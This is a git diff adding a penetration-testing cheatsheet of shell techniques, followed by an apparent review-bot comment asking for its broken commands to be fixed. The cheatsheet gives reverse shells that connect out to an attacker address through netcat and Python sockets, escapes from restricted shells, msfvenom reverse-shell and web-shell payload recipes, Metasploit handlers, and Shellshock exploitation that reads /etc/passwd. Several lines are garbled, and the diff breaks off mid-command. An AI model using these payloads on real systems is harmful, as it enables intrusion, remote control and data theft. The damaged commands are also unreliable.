diff --git a/Cheatsheet_Shells.txt b/Cheatsheet_Shells.txt new file mode 100644 index 0000000..2c8f549 --- /dev/null +++ b/Cheatsheet_Shells.txt 
@@ -0,0 +1,147 @@ +Netcat Shell Listener +`nc -nlvp 4444` + +Spawning a TTY Shell - Break out of Jail or limited shell +You should almost always upgrade your shell after taking control of an apache or www user. +(For example when you encounter an error message when trying to run an exploit sh: no job control in this shell ) +(hint: sudo -l to see what you can run) + +You may encounter limited shells that use rbash and only allow you to execute a single command per session. +You can overcome this by executing an SSH shell to your localhost: +ssh user@$ip nc $localip 4444 -e /bin/sh +enter user's password +python -c 'import pty; pty.spawn("/bin/sh")' +export TERM=linux +`python -c 'import pty; pty.spawn("/bin/sh")'` +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);' +`echo os.system('/bin/bash')` +`/bin/sh -i` +`perl 'exec "/bin/sh";'` +perl: `exec "/bin/sh";` +ruby: `exec "/bin/sh"` +lua: `os.execute('/bin/sh')` +From within IRB: `exec "/bin/sh"` + +From within vi: `:!bash` +or +`:set shell=/bin/bash:shell` + +From within vim `':!bash':` + +From within nmap: `!sh` + +From within tcpdump +echo id\\n/bin/netcat $ip 443 “e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump ln I eth- -w /dev/null W 1 G 1 z /tmp/.tst Z root + +From busybox `/bin/busybox telnetd -|/bin/sh -p9999` + +Pen test monkey PHP reverse shell +http://pentestmonkey.net/tools/web-shells/php-reverse-shel + +php-findsock-shell - turns PHP port 80 into an interactive shell +http://pentestmonkey.net/tools/web-shells/php-findsock-shell + +Perl Reverse Shell +http://pentestmonkey.net/tools/web-shells/perl-reverse-shell + +PHP powered web browser Shell b374k with file upload etc. 
+https://github.com/b374k/b374k + +Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell +https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 + +Web Backdoors from Fuzzdb +https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors + +Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/ + +*Linux* +`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf` + +*Windows* +`msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe` + +*Mac* +`msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho` + + +**Web Payloads** + +*PHP* +`msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php` +OR +`msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php` + +Then we need to add the shell.php && pbpaste >> shell.php` + +*ASP* +`msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp` + +*JSP* +`msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp` + +*WAR* +`msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war` + + +**Scripting Payloads** +*Python* +`msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py` + +*Bash* +`msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh` + +*Perl* +`msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl` + + +**Shellcode** +For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. 
+ +*Linux Based Shellcode* +`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f ` + +*Windows Based Shellcode* +`msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f ` + +*Mac Based Shellcode* +`msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f ` + + +**Handlers** +Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. +use exploit/multi/handler +set PAYLOAD +set LHOST +set LPORT +set ExitOnSession false +exploit -j -z + +Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ + +- SSH to Meterpreter: https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/ + +use auxiliary/scanner/ssh/ssh_login +use post/multi/manage/shell_to_meterpreter + + +Shellshock + +Testing for shell shock with NMap +`root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip` + +git clone https://github.com/nccgroup/shocker +`./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose` + +Shell Shock SSH Forced Command + +Check for forced command by enabling all debug output with ssh +ssh -vvv +ssh -i noob noob@$ip '() { :;}; /bin/bash' + +cat file (view file contents) +echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(
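Review bot: the privilege-escalation one-liner under "From within tcpdump" cannot work as written: the tcpdump flags have lost their dashes (`ln I eth- -w /dev/null W 1 G 1 z /tmp/.tst Z root` should be `-ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root`), the `“e` before `/bin/bash` should be `-e`, the helper script is written to `/tmp/.test` but handed to `-z` as `/tmp/.tst`, so the post-rotate hook would never find it, and the `\n` in the `echo` only becomes a newline with `echo -e` (or `$'...'`), otherwise the script is a single line. Please also fix the other copy-paste hazards in this hunk before merging: the Python reverse-shell one-liner carries markdown escapes (`socket.AF\_INET`, `\["/bin/sh","-i"\]`) that break it when pasted from a `.txt` cheatsheet; the busybox line `telnetd -|/bin/sh -p9999` should read `telnetd -l /bin/sh -p 9999`; the vim entry `':!bash':` has stray quotes; the `pty.spawn` line appears twice; the pentestmonkey link is truncated to `php-reverse-shel`; the sentence starting "Then we need to add the shell.php &&" has lost the words explaining what is prepended to shell.php and the command it introduces; and the final `echo -e "HEAD /cgi-bin/status HTTP/1.1...` line stops mid-command, so the Shellshock HTTP example is incomplete.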